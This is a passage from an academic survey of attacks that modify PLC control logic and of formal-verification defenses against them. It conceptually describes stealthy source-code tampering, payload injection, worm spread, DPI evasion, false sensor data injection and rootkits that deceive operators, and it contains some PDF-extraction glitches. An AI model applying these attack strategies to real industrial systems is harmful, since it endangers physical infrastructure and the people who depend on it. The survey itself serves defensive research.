Our study makes the following contributions:
Systematization of control logic modification attacks and formal verification-based defenses in the last thirty years.
Identifying the challenges in defending against control logic modification attacks, and the barriers existing in current formal verification research.
Pointing out future research directions.

Figure 2: The architecture of a PLC.

The rest of the paper is organized as follows. Section 2 briefly describes the background knowledge of PLCs and formal verification. Section 3 describes the motivation of this work and the methodology of the systematization. Sections 4 and 5 systematize existing studies on control logic modification attacks and formal verification-based defenses, categorized by threat models and the approaches to perform the attack/defense. Section 6 provides recommendations for future research directions to counter existing challenges. Section 7 concludes the paper.

2. Background

2.1. PLC Program

2.1.1. Programming languages.
IEC 61131 [87] defined five types of languages for PLC source code: Ladder diagram (LD), Structured text (ST), Function block diagram (FBD), Sequential function chart (SFC), and Instruction list (IL). Among them, LD, FBD, and SFC are graph-based languages. IL was deprecated in 2013. PLC programs are developed in engineering stations, which provide standard-compliant or vendor-specific Integrated Development Environments (IDEs) and compilers. Some high-end PLCs also support computer-compatible languages (e.g., C, BASIC, and assembly), special high-level languages (e.g., Siemens GRAPH5 [2]), and boolean logic languages [67].

2.1.2. Program bytecode/binary. An engineering station may compile source code to bytecode or binary depending on the type of PLC. For example, Siemens S7 compiles source code to proprietary MC7 bytecode and uses the PLC runtime to interpret the bytecode, while CODESYS compiles source code to binaries (i.e. native machine code) [55]. Unlike conventional software that follows well-documented formats, such as the Executable and Linkable Format (ELF) for Linux and Portable Executable (PE) for Windows, the format of PLC binaries is often proprietary and unknown. Therefore, further exploration requires reverse engineering.

2.1.3. Scan cycle. Unlike conventional software, a PLC program executes by infinitely repeating a scan cycle that consists of three steps (as Figure 2 shows). First, the input scan reads the inputs from the connected sensors and saves them to a data table. Then, the logic execution feeds the input data to the program and executes the logic. Finally, the output scan produces the output to the physical processes based on the execution result. The scan cycle must comply with strict predefined timing constraints to enforce real-time execution.
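The three steps above can be sketched as a single loop body in Python. This is a simplification made for illustration: the function names and the dictionary-based data table are assumptions, and the sleep-based pacing stands in for the watchdog a real PLC uses to enforce the maximum cycle time.

```python
import time

def scan_cycle(read_sensors, logic, write_actuators, cycle_time_s):
    """One iteration of the classic PLC scan: input scan, logic
    execution, output scan, then pad out the remaining cycle
    budget. A real PLC trips a watchdog on overrun instead of
    sleeping; this sketch just raises."""
    start = time.monotonic()
    inputs = read_sensors()        # 1. input scan -> data table
    outputs = logic(inputs)        # 2. logic execution
    write_actuators(outputs)       # 3. output scan
    elapsed = time.monotonic() - start
    if elapsed > cycle_time_s:
        raise RuntimeError("cycle overrun")   # watchdog would trip
    time.sleep(cycle_time_s - elapsed)
    return outputs

# Toy process: echo a button press to a lamp within a 10 ms cycle.
out = scan_cycle(lambda: {"button": True},
                 lambda i: {"lamp": i["button"]},
                 lambda o: None,
                 cycle_time_s=0.01)
print(out)  # {'lamp': True}
```

The fixed cycle budget is what makes heavyweight dynamic analysis impractical on a PLC: any security check has to fit inside the slack between `elapsed` and the cycle time.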
The I/O operations are the critical part of meeting the cycle time.

2.1.4. Hardware support. PLCs adopt a hierarchical memory, with a predefined addressing scheme associated with physical hardware locations. PLC vendors may choose different schemes for I/O addressing, memory organization, and instruction sets, making it hard for the same code to be compatible across vendors, or even across models from the same vendor.

2.2. PLC program security

PLCs interact with a broad set of components, as Figure 3 shows. They are connected to sensors and actuators to interact with and control the physical world. They are connected to supervisory human interfaces (e.g. the engineering station) to update the program and receive operator commands. They may also be interconnected in a subnet. These interactions expose PLCs to various attacks. For example, communication between the engineering station and the PLC may be insecure, the sensors might be compromised, and the PLC firmware can be vulnerable.

2.2.1. Control logic modification. Our study considers control logic modification attacks, which we define as attacks that can change the behavior of PLC control logic. Control logic modification attacks can be achieved through program payload/code modification and/or program input manipulation. The payload modification can be applied to program source code, bytecode, or binary (Section 2.1). The input manipulation can craft input data to exploit existing design flaws in the program to produce undesired states. The input may come from any interacting component shown in Figure 3. Defending against these attacks is challenging. As mentioned earlier, PLCs have to strictly maintain the scan cycle time to control the physical world in real time. This requirement rules out security solutions requiring a large amount of dynamic analysis. Moreover, the security solution has to be accurate, since the controlled physical processes are critical in industry, making false positives less tolerable.

2.2.2. Formal verification.
Formal verification is a lightweight and accurate defense solution, often tailored for graphical languages. This makes it suitable to defend against control logic modification attacks. Formal verification is a method that proves or disproves whether a program/algorithm meets its specifications or desired properties based on a certain form of logic [32]. The specification may contain security requirements and safety requirements. Commonly used mathematical models for formal verification include finite state machines, labeled transition systems, vector addition systems, Petri nets, timed automata, hybrid automata, process algebra, and formal semantics of programming languages, e.g. operational semantics, denotational semantics, axiomatic semantics, and Hoare logic. In general, there are two types of formal analysis: model checking and theorem proving [45]. Model checking uses temporal logic to describe specifications, and efficient search methods to check whether the specifications hold for a given system. Theorem proving describes the system with a series of logical formulae. It proves that the formulae imply the property via deduction, with inference rules provided by the logical system. It usually requires more background knowledge and nontrivial manual effort. We will describe the commonly used frameworks and tools for formal verification in later sections. An extended background in Appendix A provides an example of an ST program controlling the traffic lights in a road intersection, an example of an input manipulation attack, and the process of using formal verification to detect and prevent it.

3. Motivation and Methodology

In this section, we first explain our focus on control logic modification attacks and formal verification-based protection. Then, we use an example to introduce our systematization methodology.

3.1. Motivation

We focus on control logic modification due to its critical impact on the PLC industry. Control logic modification covers attacks from program payload (i.e.
program code) modification to data input manipulation. These attacks result from frequently reported vulnerabilities, and also cause unsafe behaviors in critical industrial infrastructure, as Figure 1 shows. To mitigate control logic modification attacks, extensive studies have been performed using formal methods on PLC programs. Formal methods have demonstrated uniqueness and practicality for the PLC industry. For example, Beckhoff TwinCAT 3 and Nuclear Development Environment 2.0 have integrated safety verification during PLC program implementation [56]. Formal methods have also been used in the PLC programs controlling Ontario Power Generation and the Darlington Nuclear Power Generating Station [76]. Nevertheless, we found existing research to be ad-hoc, and the area is still new to the security community. We believe our systematization can benefit the community with recommendations for future research directions. Besides formal methods, there are additional defense techniques. At the design level, one can use encrypted network communication, private sensor inputs, and isolate different functionalities of the engineering station. These protections are orthogonal to formal methods and common for any type of software/architecture. In addition, one can leverage intrusion detection techniques with dynamic analysis. Such analysis often involves complex algorithms, such as machine learning or neural networks, which require extensive runtime memory and may introduce false positives. However, PLCs have limited memory and are
To improve PLC security, formal methods cancooperate with these techniques. 3.2. Methodology 3.2.1. Motivating Example. Figure 3shows a motivating example with a PLC controlling traf c light signals at anintersection. In step 1/circlecopyrt, a PLC program developer pro- grams the control logic code in one of the ve languagesdescribed in Section 2.1.1, in an engineering station (e.g. located in the transportation department). The engineeringstation compiles the code into bytecode or binary basedon the type of the PLC. Then in step 2/circlecopyrt, the compiled bytecode/binary will be transmitted to the PLC located at aroad intersection through network communication. In step 3/circlecopyrt, the bytecode/binary will run in the PLC, by using the input from sensors (e.g. whether a pedestrian presses thebutton to cross the intersection), and producing output tocontrol the physical processes (i.e. turning on/off a greenlight). The duration of lights will depend on whether apedestrian presses the button to cross. Within each step, vulnerabilities can exist which al- low attackers to affect the behavior of the control logic.The following describes the threat model assumptions forattackers to perform control logic modi cation attacks. 3.2.2. Threat Model Assumptions. T1: In this threat model, attackers assume accesses to the program source code, developed in one of the languages described inSection 2.1.1. Attackers generate attacks by directly mod- ifying the source code. Such attacks happen in the en-gineering station as step 1/circlecopyrtin Figure 3. Attackers can be internal staffs who have accesses to the engineeringstation, or can leverage vulnerabilities of the engineeringstation [1], [50], [51] to access it. T2: In this threat model, attackers have no access to program source code but can access program bytecode or binary. Attackers generate attacks by rst reverse en-gineering the program bytecode/binary, then modifyingthe decompiled code, and nally recompiling it. 
Such attacks happen during the bytecode/binary transmission from the engineering station to the PLC (② in Figure 3). Attackers can intercept and modify the transmission by leveraging vulnerabilities in the network communication [48], [49], [52]. T3: In this threat model, attackers have no access to program source code or bytecode/binary. Instead, attackers can guess/speculate the logic of the control program by accessing the program runtime environment, including the PLC firmware, hardware, and/or input and output traces. Attackers can modify the real-time sensor input to the program (③ in Figure 3). Such attacks are practical since, within the same domain, the general settings of the infrastructure layout are similar, and infrastructures (e.g. traffic lights) can be publicly accessible [3], [43], [69].

3.2.3. Weaknesses. Attackers usually leverage existing program weaknesses for control logic modification. The following enumerates the weaknesses.
W1: Multiple assignments for output variables. A race condition can happen when an output variable depends on multiple timers or counters. Since one timer may run faster or slower than the other, at a certain moment the output variable will produce a nondeterministic value. In the traffic light example, this may cause the green light to turn on and off within a short time, or two lights to be on simultaneously.
W2: Uninitialized or unused variables. An uninitialized variable will be given the default value in a PLC program. If an input variable is uninitialized, attackers can provide illegal values for it during runtime. Similarly, attackers can leverage unused output variables to send private information.
W3: Hidden jumpers. Such jumpers will usually bypass a portion of the program, and are only triggered on a certain (attacker-controlled) condition. The attackers can embed malware in the bypassed portion of the program.
W4: Improper runtime input.
Attackers can craft illegal input values based on the types of the input variables to cause unsafe behavior. For example, attackers can provide an input index that is out of the bounds of an array.
W5: Predefined memory layout of the PLC hardware. PLC addressing usually follows a format [6] of a storage class (e.g. I for input, Q for output), a data size (e.g. X for BOOL, W for WORD), and a hierarchical address indicating the location of the physical port. Attackers can leverage the format to speculate about the variables during runtime.
W6: Real-time constraints. The scan cycle has to strictly follow a maximum cycle time to enforce real-time execution. In non-preemptive multitask programs, one task has to wait for the completion of another task before starting the next scan cycle. To generate synchronization attacks, attackers can create loops or introduce a large number of I/O operations to extend the execution time.

Among the weaknesses, attackers need accurate program information to exploit W1, W2, and W3. Therefore, these attacks usually happen in T1. To disguise the modification to the source code, attackers in T1 can include these weaknesses as bad coding practice, without affecting the major control logic. The other weaknesses are usually exploited in T2 and T3.

3.2.4. Security Goals. The security goals of existing studies are related to the security properties of the CIA triad: confidentiality, integrity, and availability.
GC: Confidentiality. The attacks violate confidentiality by stealthily monitoring the execution of PLC programs leveraging existing weaknesses (e.g. W2, W3). Formal verification approaches defend accordingly.
GI: Integrity. The attacks violate integrity by causing PLC programs to produce states that are unsafe for the physical process (e.g. plant), for example, overflowing a
water tank, or fluctuating power generation [11], [58], [85]. Formal verification approaches defend by verifying (i) generic properties that are process-independent, and (ii) domain-specific properties that consider the plant model. Due to the number of studies targeting GI, we further split GI into generic payload modification (GI1) without program I/O or plant settings, generic input manipulation (GI2) with program I/O, domain-specific payload modification (GI3) with plant settings, and domain-specific input manipulation (GI4) with program I/O and plant settings.
GA: Availability. The attacks violate availability by exhausting PLC resources (memory or processing power) and causing a denial of service. Formal verification approaches defend accordingly.

4. Systematization of Attacks

This section systematizes PLC attack methodologies under the categorization of threat models. Within each category, we discuss the goals of the attacks and the underlying weaknesses. We also summarize the challenges of attack mitigation.

4.1. Attack Methodologies

Given the exposed threat models, the following describes the attack methodologies of existing studies according to the security goals. Table 1 summarizes these studies.

4.1.1. T1: program source code. At the source code level, the code injection or modification has to be stealthy, in a way that no observable changes are introduced to the major functionality of the program, or masked as novice programmer mistakes. In other words, the attacks could be disguised as unintentional bad coding practices. Existing studies [84], [88] mainly discussed attacks on graphical languages, e.g. LD, because small changes to such programs cannot be easily noticed.
Serhane et al. [84] focused on the weak points of LD programs that could be exploited by malicious attacks. Targeting G1 to cause unsafe behaviors, attackers could generate unpredictably fluctuating output variables; for example, intentionally introducing two timers to control the same output variable could lead to a race condition. This could damage devices, similar to Stuxnet [33], but unpredictably. Attackers could also bypass certain functions, manually force the values of certain operands, or apply empty branches or jumps. Targeting G2 to stay stealthy while spying on the program, attackers could use array instructions or user-defined instructions to log critical parameters and values. Targeting G3 to generate DoS attacks, attackers could apply an infinite loop via jumps, and use nested timers and jumps to trigger the attack only at a certain time. This attack could slow down or crash the PLC in a severe manner. Because PLC programmers often leave unused variables and operands, both the spying program and the DoS program could leverage unused programming resources. These attacks leveraged weaknesses W1-W4, and focused on single-ladder programs. To extend the attacks to multi-ladder programs, Valentine et al. [88] further presented attacks that could install a jump to a subroutine command, and modify the interaction between two or more ladders in a program. This could be disguised as an erroneous use of scope and linkage by a novice programmer. In addition to code injection and modification, McLaughlin et al. [69] presented input manipulation attacks to cause unsafe behaviors. This study analyzed the code to obtain the relationship between the input and output variables and deduced the desired range for output variables. Attackers can craft inputs that lead to undesired outputs for the program. The crafted inputs have to evade the state estimation detection of the PLC.
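The two-timers-one-output weakness (W1) exploited above can be sketched in Python. Everything here is hypothetical: the rung structure, the timer periods, and the scan count are invented, and the `order` parameter stands in for the fact that which rung's write "wins" is not under the operator's control.

```python
def program(order, scans=25):
    """W1 sketch: two rungs drive the same output from two timers
    with different periods. The final lamp value depends on which
    rung executes last, so the observable output is effectively
    nondeterministic from the operator's point of view."""
    t1 = t2 = 0
    lamp = False
    for _ in range(scans):
        t1 += 1                       # timer 1: period 5
        t2 += 1                       # timer 2: period 7
        rung_a = (t1 % 5 == 0)        # rung A's condition
        rung_b = (t2 % 7 == 0)        # rung B's condition
        for rung in order:            # both rungs write one coil
            lamp = rung_a if rung == "A" else rung_b
    return lamp

# Identical logic, different rung ordering, different output:
print(program(order="AB"), program(order="BA"))  # False True
```

Because the program text looks like an ordinary pair of timer rungs, the double assignment is easy to pass off as a novice mistake, which is exactly the disguise the attacks above rely on.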
Since the input manipulation happens in T3, and more studies discussed input manipulation attacks without using source code, we will elaborate on these attacks under T3.

4.1.2. T2: program bytecode/binary. Studies under this threat model mainly investigated program reverse engineering and program modification attacks. Instead of disguising the attack as bad coding practice, like those in T1, the injection at the program binary level aims at evading behavior detectors. To design an attack prototype, McLaughlin et al. [70] tested a train interlocking program. The program was reverse engineered using a format library. With the decompiled program, they extracted the fieldbus ID that indicated the PLC vendor and model, and then obtained clues about the process structure and operations. To generate unsafe behaviors, such as causing conflicting states for the train signals, they targeted timing-sensitive signals and switches. To evade safety property detection, they adopted an existing solution [34] to find the implicit properties of the behavior detectors. For example, variable r depends on p and q, so a property may define the relationship between p and q as a method to protect r. However, attackers can directly change the value of r without affecting p and q, and the change will not alarm the detector. In this way, they automatically searched for all the Boolean equations, and could generate malicious payloads based on that. Based on this prototype, SABOT [68] was implemented. SABOT required a high-level description of the physical process, for example, "the plant contains two ingredient valves and one drain valve". Such information could be acquired from public channels, and is similar for processes in the same industrial sector.
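The implicit-property evasion just described can be sketched in Python. The detector's property, the scan function, and the variable roles below are hypothetical reconstructions of the p/q/r example in the text, not McLaughlin et al.'s actual system.

```python
def detector(p, q):
    """Hypothetical safety property: the detector guards r only
    indirectly, by constraining the variables r is computed from."""
    return not (p and q)

def scan(p, q, tamper_r=False):
    r = p or q          # intended logic: r depends on p and q
    if tamper_r:
        r = True        # attacker forces r, leaving p and q untouched
    return r, detector(p, q)

# The output is forced on, yet the detector still reports safe,
# because the implicit property never mentions r itself.
r, ok = scan(p=False, q=False, tamper_r=True)
print(r, ok)  # True True
```

This is why the text stresses searching out implicit properties: a specification that only constrains p and q leaves a direct write to r invisible.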
With this information, SABOT generated a behavioral specification for the physical processes and used incremental model checking to search for a mapping between a variable within the program and a specified physical process. Using this map, SABOT compiled a dynamic payload customized for the physical process. Both studies were limited to Siemens devices, without revealing many details on reverse engineering. To provide more information, and to support CodeSys-based programs, Keliris et al. [55] implemented an open-source decompiler, ICSREF, which could automatically reverse engineer CodeSys-based programs and generate malicious payloads. ICSREF targeted PID controller functions and manipulated parameters such as the setpoints, proportional/integral/derivative gains, initial values, etc. ICSREF inferred the physical characteristics of the controlled process, so that modified binaries could deploy meaningful and impactful attacks.

389 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply.

TABLE 1: The studies investigating control logic modification attacks.

Threat Model       | Paper               | Weakness  | Security Goal | Attack Type | Detection to Evade | Network Access | PLC Language/Type | Tools
T1 source code     | Serhane 18 [84]     | W1,2,3    | GI1,GC,GA     | both        | Programmer         | ES             | LD, RSLogix       | N/A
                   | Valentine 13 [88]   | W1,2,3,6  | GI1,GC        | passive     | Programmer         | N/A            | LD                | PLC-SF, vul. assessment
                   | McLaughlin 11 [70]  | W4        | GI3           | both        | State verif.       | ES             | generic           | N/A
T2 bytecode/binary | ICSREF [55]         | W4        | GI3           | passive     | N/A                | ES,PLC         | Codesys-based     | angr, ICSREF
                   | SABOT [68]          | W4        | GI3           | passive     | N/A                | ES,PLC         | IL                | NuSMV
                   | McLaughlin 11 [70]  | W4        | GI3           | both        | State verif.       | ES,PLC         | generic           | N/A
T3 runtime         | PLCInject [58]      | W5        | GC            | both        | N/A                | ES,PLC         | IL, Siemens       | PLCInject malware
                   | PLC-Blaster [85]    | W5        | GC,GA         | active      | N/A                | ES,Sensor,PLC  | Siemens           | PLC-Blaster worm
                   | Senthivel 18 [83]   | W4        | GI1           | active      | ES                 | ES,PLC         | LD, AB/RSLogix    | PyShark, decompiler Laddis
                   | CLIK [54]           | W4        | GI1           | both        | ES                 | PLC            | IL, Schneider     | Eupheus decompilation
                   | Beresford 11 [11]   | W4,5      | GI2           | both        | N/A                | ES,PLC         | Siemens S7        | Wireshark, Metasploit
                   | Lim 17 [64]         | W4,5      | GI4,GA        | active      | ES                 | ES,PLC         | Tricon PLC        | LabVIEW, PXI Chassis, Scapy
                   | Xiao 16 [92]        | W4        | GI4           | both        | State verif.       | Sensor,PLC     | generic           | N/A
                   | Abbasi 16 [3]       | W4        | GI2           | both        | Others             | N/A            | Codesys-based     | Codesys platform
                   | Yoo 19 [94]         | W5        | GI1           | both        | Others             | ES,PLC         | Schneider/AB      | DPI and detection tools
                   | LLB [43]            | W4,6      | GI1,GI2       | both        | Programmer         | ES,PLC         | LD, AB            | Studio 5000, RSLinx, LLB
                   | CaFDI [69]          | W4        | GI4           | both        | State verif.       | N/A            | generic           | CaFDI
                   | HARVEY [37]         | W4,5      | GI4,GC        | both        | ES                 | ES,PLC         | AB                | Hex, dis-assembler, EMS

Engineering Station (ES), Allen-Bradley (AB). Tools: vulnerability (vul.). Detection to evade: verification (verif.).

4.1.3. T3: program runtime.

At this level, existing studies investigated two types of attacks: the program modification attack and the program input manipulation attack. The input of the program could come either from the communication between the PLC and the engineering station, or from the sensor readings.

Program modification attack. This requires reverse engineering and payload injection, similar to studies in T2. The difference is that, with the PLC memory layout available, and the features supported by the PLC, the design of the payload becomes more targeted. Through injecting malicious payloads into the code, PLCInject [58] and PLC-Blaster [85] demonstrated the widespread impact of malicious payloads. PLCInject crafted a payload with a scanner and proxy.
Due to the predefined memory layout of Siemens Simatic PLCs, PLCInject injected this payload at the first organization block (OB) to change the initialization of the system. This attack turned the PLC into a gateway to the network of PLCs. Using PLCInject, Spenneberg [85] implemented a worm, PLC-Blaster, that can spread among PLCs. PLC-Blaster spread by replicating itself and modifying the target PLCs to execute it along with the already installed programs. PLC-Blaster adopted several anti-detection mechanisms, such as avoiding the anti-replay byte, storing itself in a less used block, and meeting the scan cycle limit. PLCInject and PLC-Blaster achieved G3 and demonstrated the widespread impact of program injection attacks. In addition, Senthivel et al. [83] introduced several malicious payloads that could deceive the engineering station. Since the engineering station periodically checks the running program from the PLC, the attackers could deceive it by providing an uninfected program while the infected program keeps executing in the PLC. Senthivel achieved this through a self-developed decompiler (Laddis) for LD programs. Senthivel also introduced three strategies to achieve this denial of engineering operations attack. In a similar setting, Kalle et al. [54] presented CLIK. After payload injection, CLIK implemented a virtual PLC, which simulated the network traffic of the uninfected PLC and fed this traffic to the engineering station to deceive the operators. These two works employed a full chain of vulnerabilities at the network level, without accessing the engineering station or the PLCs.

Input manipulation through the network. Several studies [11], [64] hijacked certain network packets between the engineering station and a PLC. Beresford et al. [11] exploited a packet (e.g., ISO-TSAP) between the PLC and the engineering station. These packets provided program information, such as variable names, data block names, and also the PLC vendor and model.
Attackers could modify these variables to cause undesired behavior. With memory probing techniques, attackers could get a mapping between these names and the variables in the PLC. This would allow them to modify the program based on their needs. This attack could cause damage to the physical processes. However, the chance of successfully mapping the variables through memory probing is small. In a nuclear power plant setting, Lim et al. [64] intercepted and modified the command-37 packets sent between the engineering station and the PLC. This packet provided input to an industrial-grade PLC consisting of redundant modules for recovery. The attack caused common-mode failures for all the modules. These attacks made their entry point through the network traffic. However, they ignored the fact that security solutions could have enabled deep packet inspection (DPI) between the PLC and the engineering station. Modified packets with malicious code or input data could have been detected before reaching the PLC. To evade DPI, Yoo et al. [94], [95] presented stealthy malware transmission, splitting the malware into small fragments and transmitting one byte per packet padded with a large amount of noise. This works because DPI merges packets for detection and thus was not able to detect such small payloads. On the PLC side, Yoo leveraged a vulnerability to control the received malicious payload, discard the padded noise, and configure the start address for execution. Although dependent on multiple vulnerabilities, this study provided insight into stealthy program modification and input manipulation at the network level.

Input manipulation through sensors. Existing studies [3], [43], [69], [92] explored different approaches to evade various behavior detection mechanisms and to achieve G1.
Govil et al. [43] presented ladder logic bombs (LLB), a combination of program injection and input manipulation attacks. The malicious payload was injected into the existing LD program as a subroutine, and could be triggered by a certain condition. Once triggered, this malware could replace legitimate sensor readings with manipulated values. LLB was designed to evade manual inspection by giving instructions names similar to commonly used ones. LLB did not consider behavior detection, such as state verification or state estimation. To counter Büchi automaton based state estimation, CaFDI [69] introduced controller-aware false data injection attacks. CaFDI required high-level information about the physical processes, and monitored I/O traces of the program. It first constructed a Büchi automaton model of the program based on its I/O traces, and then searched for a set of inputs that may cause the model to produce the desired malicious behavior. CaFDI calculated the Cartesian product of the safe model and the unsafe model, and recursively searched for a path that could satisfy the unsafe model in the formalization. The resulting path of inputs would be used as the sensor readings for the program. To stay stealthy, CaFDI avoided noticeable inputs, such as an LED indicator. Xiao [92] fine-tuned the undesired model to evade existing sequence-based fault detection [57]. An attacker could first construct a discrete event model from the collected fault-free I/O traces using non-deterministic autonomous automata with output (NDAAO), then build a word set of NDAAO sequences, and finally search for undetectable false sequences from the word set to inject into the compromised sensors. Similarly, by combining the control flow of the program, Abbasi et al. [3] presented configuration manipulation attacks by exploiting certain pin control operations, leveraging the absence of hardware interrupts associated with the pins.
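The word-set evasion just described can be sketched in a few lines. This is a simplified illustration, not the NDAAO construction from [92]: the model is reduced to the set of fixed-length "words" (subsequences) observed in fault-free traces, and a crafted sequence evades the detector exactly when every word it contains has been seen before. All trace contents are made up.

```python
# Sketch: sequence-based detection summarized as a set of k-length
# words from fault-free I/O traces; a sequence is "undetectable" if
# all of its k-words are already in that set.

def word_set(traces, k=2):
    """Collect every k-length subsequence seen in the fault-free traces."""
    words = set()
    for t in traces:
        words.update(tuple(t[i:i + k]) for i in range(len(t) - k + 1))
    return words

def undetected(seq, words, k=2):
    """True if the detector never sees an unknown k-word in seq."""
    return all(tuple(seq[i:i + k]) in words for i in range(len(seq) - k + 1))

fault_free = [["idle", "fill", "heat", "drain", "idle"],
              ["idle", "fill", "drain", "idle"]]
W = word_set(fault_free)

# A composite sequence never observed as a whole, yet built only from
# known words, slips past the detector:
print(undetected(["idle", "fill", "drain", "idle", "fill", "heat", "drain", "idle"], W))
# A transition never seen in any trace is flagged:
print(undetected(["idle", "heat"], W))
```

The attacker's search in [92] is essentially over sequences of the first kind: false but locally consistent with the learned model.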
To evade general engineering operations, Garcia [37] developed HARVEY, a PLC rootkit at the firmware level that can evade operators viewing the HMI. HARVEY faked sensor input to the control logic to generate adversarial commands, while simulating the legitimate control commands that an operator would expect to see. In this way, HARVEY could maximize the damage to the physical power equipment and cause large-scale failures, without operators noticing the attack. HARVEY assumed access to the PLC firmware, which was less monitored than the control logic program. These studies make it practical to inject malicious payloads either through a compromised network or through insecure sensor configurations. Because of their stealthiness, it remains challenging to design security solutions to counter them. The following details the challenges.

4.2. Challenges

Expanded attack input surfaces. The attack input surfaces for PLC programs are expanding. The aforementioned studies have shown input sources including (1) the communication from the engineering station, with certain packets intercepted and hijacked, (2) internet-facing PLCs in the same subnet, and (3) compromised sensors and firmware. It becomes challenging for defense solutions to scope an appropriate threat model, since any component along the chain of control could be compromised.

Predefined hierarchical memory layout. Multiple studies leveraged this weakness to perform attacks. However, traditional defense solutions [22] face many challenges: (1) address space layout randomization (ASLR) would be too heavy to meet the scan cycle requirements of PLCs, and would still suffer from code-reuse attacks, (2) control flow integrity based solutions require a substantial amount of memory, and would find it hard to detect or mitigate the attacks in real time, and (3) the hierarchical memory layout is vendor-specific, and the attacks targeting it are product-driven, for example, Siemens Simatic S7 [11], [85].
It is challenging to design a lightweight and generalized defense solution.

Confidentiality and integrity of the program I/O. The majority of the studies depended on the program I/O to perform attacks, either to extract information about the physical processes and possible detection methods, or to manipulate input to produce unsafe behaviors. Protecting I/O is challenging in that (1) the input surfaces of the programs are expanding, (2) sensors and physical processes could be public infrastructure, and (3) the I/O has to be updated frequently to meet the scan cycle requirement.

Stealthy attack detection. We have mentioned many stealthiness strategies based on different threat models, including (1) disguising malicious code as human errors, (2) code obfuscation with fragmentation and noise padding to evade DPI, (3) crafting input to evade state estimation and verification algorithms, (4) using specific memory blocks or configurations of the PLC, and (5) deceiving the engineering station with faked legitimate behaviors. It is challenging for a defense solution to capture these stealthy attacks.

Implicit or incomplete specifications. Multiple studies have shown crafted attacks using implicit properties [68], [70]. The difficulties of defining precise and complete specifications lie in that (1) product requirements may change over time, thus requiring updates to the semantics of inputs and outputs, (2) limited expressiveness can lead to incompleteness, while over-expressiveness may lead to implicitness, and (3) domain-specific knowledge is usually needed. It is challenging to design specifications that overcome these difficulties.

5. Formal Verification based Defenses

A large body of research uses formal verification for PLC safety and security, as Table 3 shows. This line of work mainly focused on the following aspects:

Behavior Modeling: Modeling the behavior of the program as a state-based, flow-oriented, or time-dependent representation.

State Reduction: Reducing the state space to improve search efficiency.
Specification Generation: Generating the specification with desired properties as a temporal logic formula.

Verification: Applying model checking or theorem proving algorithms to verify the security or safety of the PLC program.

Based on these aspects, the following discusses defense methodologies. We use the same threat models, security goals, and weaknesses as mentioned in Section 3.2.

5.1. Behavior Modeling

The goal of behavior modeling is to obtain a formal representation of the PLC program behavior, so that, given a specification, a formal verification framework can understand and verify it. The following discusses behavior modeling based on different threat models.

5.1.1. T1: program source code.

At the source code level, a line of studies [4], [30], [41], [76] has investigated the formal modeling of generic program behaviors. The majority of them translated programs to automata and Petri nets, since these are well supported by most formal verification frameworks [4]. These translations usually consider each program unit as an automaton, including the main program, functions, and function block instances. Each variable defined in the program unit is translated to a corresponding variable in the automaton. Input variables are assigned non-deterministically at the beginning of each PLC cycle. The whole program is modeled as a network of automata, where a transition represents the changes of variable values in different execution cycles, and a synchronization pair represents synchronized transitions of function calls. With a similar modeling method, Newell et al. [76] translated FBD programs to Prototype Verification System (PVS) models, since certain nuclear power generating stations can only support such a representation.
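The cycle-per-transition modeling style above can be sketched concretely. The following toy sketch treats one scan cycle as one transition, assigns the two Boolean inputs non-deterministically at the start of each cycle (here, by enumerating all valuations), and explores the reachable state space with a simple worklist search. The start/stop latch program is an invented example, not taken from any cited study.

```python
# Sketch: a PLC program modeled as an automaton whose transitions are
# scan cycles, with non-deterministic inputs each cycle.
from itertools import product

def scan_cycle(state, inputs):
    """Body of an illustrative program: a start/stop motor latch."""
    start, stop = inputs
    running = (state["running"] or start) and not stop
    return {"running": running}

def reachable_states(initial):
    """Enumerate every state reachable under any input sequence."""
    seen, frontier = {tuple(initial.items())}, [initial]
    while frontier:
        state = frontier.pop()
        for inputs in product([False, True], repeat=2):  # all input valuations
            nxt = scan_cycle(state, inputs)
            key = tuple(nxt.items())
            if key not in seen:
                seen.add(key)
                frontier.append(nxt)
    return seen

print(len(reachable_states({"running": False})))  # both latch states are reachable
```

A model checker operates on exactly this kind of transition relation, except symbolically rather than by explicit enumeration.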
These studies could formally model most PLC behaviors, especially the internal logic within the PLC code. However, with only source code available, behavior modeling lacks the interaction with the PLC hardware and the physical processes, which might allow unsafe or malicious behaviors to bypass later formal verification. The following discusses behavior modeling with more information available.

5.1.2. T2: program bytecode/binary.

Fewer studies have investigated behavior modeling at the program binary level. The challenges lie in reverse engineering. As mentioned in existing works [71], [100], several PLC features are not supported in normal instruction sets. PLCs are designed with hierarchical addressing using a dedicated memory area for the input and output buffers. The function blocks use a parameter list with fixed entry and exit points. PLCs also support timers that act differently between bit-logic instructions and arithmetic instructions. Thanks to an open-source library [60], which can disassemble Siemens PLC binary programs into STL (the IL equivalent for Siemens) programs, several works [21], [71], [93], [100] studied modeling Siemens binary programs. Based on the STL program, TSV [71] leveraged an intermediate language, ILIL, to allow more complete instruction modeling. With concolic execution, TSV obtained the information flow from the system registers and the memory. After executing multiple scan cycles, a temporal execution graph was constructed to represent the states of the controller code. After TSV, Zonouz et al. [100] adopted the same modeling. Chang et al. [21] and Xie et al. [93] constructed control flow graphs with similar executable paths. Chang deduced the output states of the timer based on the existing output state transition relationships, while Xie used constraints to model the program. Combined with studies at T1, these studies could handle more temporal features, such as varied scan cycle lengths, and enabled input-dependent behavior modeling.
With control flow based representation, nested logic and pointers could also be supported. However, without concrete execution of the programs, the drawbacks are obvious: (1) the input vectors were either random or had to be manually chosen, (2) the number of symbolic states limited the program sizes, and (3) the temporal information further increased resource consumption. Next, we discuss behavior modeling with runtime information.

5.1.3. T3: program runtime.

With runtime information, existing research [19], [53], [65], [98], [99] modeled programs considering their interactions with the physical processes, the supervisor, and the operator tasks. This allowed more realistic modeling of timing-sensitive instructions, and domain-specific behavior modeling. Automated frameworks [91], [99] were presented to model PLC behaviors with interrupt scheduling, function calls, and I/O traces. Zhou et al. [99] adopted an environment module for the inputs and outputs, an interruption module for time-based instructions, and a coordinator module to schedule these two modules with the main program. Wang et al. [91] automated a BIP (Behavior, Interaction, Priority) framework to formalize the scanning mode, the interrupt scheduler, and the function calls. Mesli et al. [72] presented component-based modeling for the whole control-command chain, with each component described as timed automata. To automate the modeling of domain-specific event behavior, VetPLC [98] generated timed event causality graphs (TECGs) from the program and the runtime data traces. The TECG maintained temporal dependencies constrained by machine operations. These studies removed the barrier to modeling event-driven and domain-specific behaviors. They could mitigate attacks violating security and safety requirements via special sequences of valid logic.

5.1.4. Challenges.

